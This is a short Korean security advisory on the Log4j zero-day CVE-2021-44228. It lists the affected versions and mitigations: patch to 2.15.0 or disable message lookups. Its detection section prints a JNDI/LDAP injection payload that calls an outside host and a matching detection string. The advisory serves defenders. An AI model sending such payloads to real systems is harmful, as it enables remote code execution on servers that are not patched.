□ 개요

o 2021.12.10. 공개된 Apache Log4j 제로데이 취약점(CVE-2021-44228)을 악용한 위협 활동이 탐지되고 있음

o Log4j는 광범위한 devops 프레임워크, 엔터프라이즈 IT 시스템, 공급업체 소프트웨어 및 클라우드 제품에 통합되어 있기 때문에 보안담당자는 시스템을 확인해 영향받는 버전을 사용중인 경우 패치할 것을 권고

□ 탐지 방법

o 공격자는 취약점을 이용해 User-Agent에 원격 코드를 삽입해 전송하므로 {Attack Payload}을 이용해 탐지가 가능

o {Attack Payload} : {jndi:ldap://ip.address/exp}

o 예) "{jndi:ldap://"

□ 영향받는 버전

o 2.0 <= Apache log4j <= 2.14.1

□ 대응방안

o 2.15.0 버전으로 업데이트

o 버전 업데이트가 어려울경우 임시조치 방안으로 시스템 속성 "log4j2.formatMsgNoLookups"를 "true"로 설정

□ 참고사이트

o https://www.lunasec.io/docs/blog/log4j-zero-day/
o https://github.com/tangxiaofeng7/apache-log4j-poc
o https://github.com/eromang/researches/tree/main/CVE-2021-44228
o https://github.com/YfryTchsGD/Log4jAttackSurface
o https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
o https://www.horizon3.ai/cve-2021-44228/
o https://www.greynoise.io/blog/apache-log4j-vulnerability-CVE-2021-44228
o https://www.veracode.com/blog/security-news/urgent-analysis-and-remediation-guidance-log4j-zero-day-rce-cve-2021-44228
o https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/
o https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html
o https://www.cert.govt.nz/it-specialists/advisories/log4j-rce-0-day-actively-exploited/